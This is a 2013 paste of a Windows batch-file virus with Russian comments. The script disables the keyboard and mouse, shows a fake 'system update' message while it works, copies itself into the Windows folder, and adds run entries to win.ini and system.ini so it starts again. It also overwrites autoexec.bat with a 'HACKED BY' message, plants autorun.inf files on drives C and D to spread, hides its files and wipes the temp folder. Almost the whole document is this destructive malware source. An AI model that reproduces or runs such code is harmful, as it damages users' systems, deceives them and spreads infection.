Untitled


SUBMITTED BY: Guest

DATE: May 14, 2013, 3:24 a.m.

FORMAT: Text only

SIZE: 1.7 kB

HITS: 1100

  1. @echo off
  2. rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
  3. rundll32 keyboard,disable //Было
  4. rundll32 mouse,disable //Было
  5. rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
  6. echo Обновление параметров системы, пожалуйста подождите... //пишет отмазку :)
  7. label mp_k //Меняем имя диску
  8. copy mp_k.exe %windir% //Копирует себя в папку windows
  9. if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
  10. deltree /y c:\autoexec.bat
  11. if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER....[]=[_H@CKED_BY_[kas]*_"SmallPox_Vir_Org"_] > c:\autoexec.bat
  12. echo run = %windir%\mp_k.exe >> %windir%\win.ini
  13. echo run = %windir%\mp_k.exe >> %windir%\system.ini
  14. echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе.
  15. echo open=c:\autoexec.bat > c:\autorun.inf
  16. echo [AutoRun] > d:\autorun.inf
  17. echo open=c:\autoexec.bat > d:\autorun.inf
  18. rundll32 mouse,enable
  19. rundll32 keyboard,enable
  20. echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
  21. echo WSHShell.Popup("Warning,.. А теперь необходимо перезагрузиться"); >> %temp%\mes.js
  22. start %temp%\mes.js
  23. deltree /y %temp%\mes.js
  24. attrib c:\autoexec.bat +h +s +a +r
  25. attrib %windir%\mp_k.exe +h +s +a +r
  26. attrib c:\autorun.inf +h +s +a +r
  27. attrib d:\autorun.inf +h +s +a +r
  28. deltree /y mp_k.exe
  29. rmdir %windir%\temp //Удаляем папку temp
  30. mkdir %windir%\temp //Создаем папку temp
  31. cls

comments powered by Disqus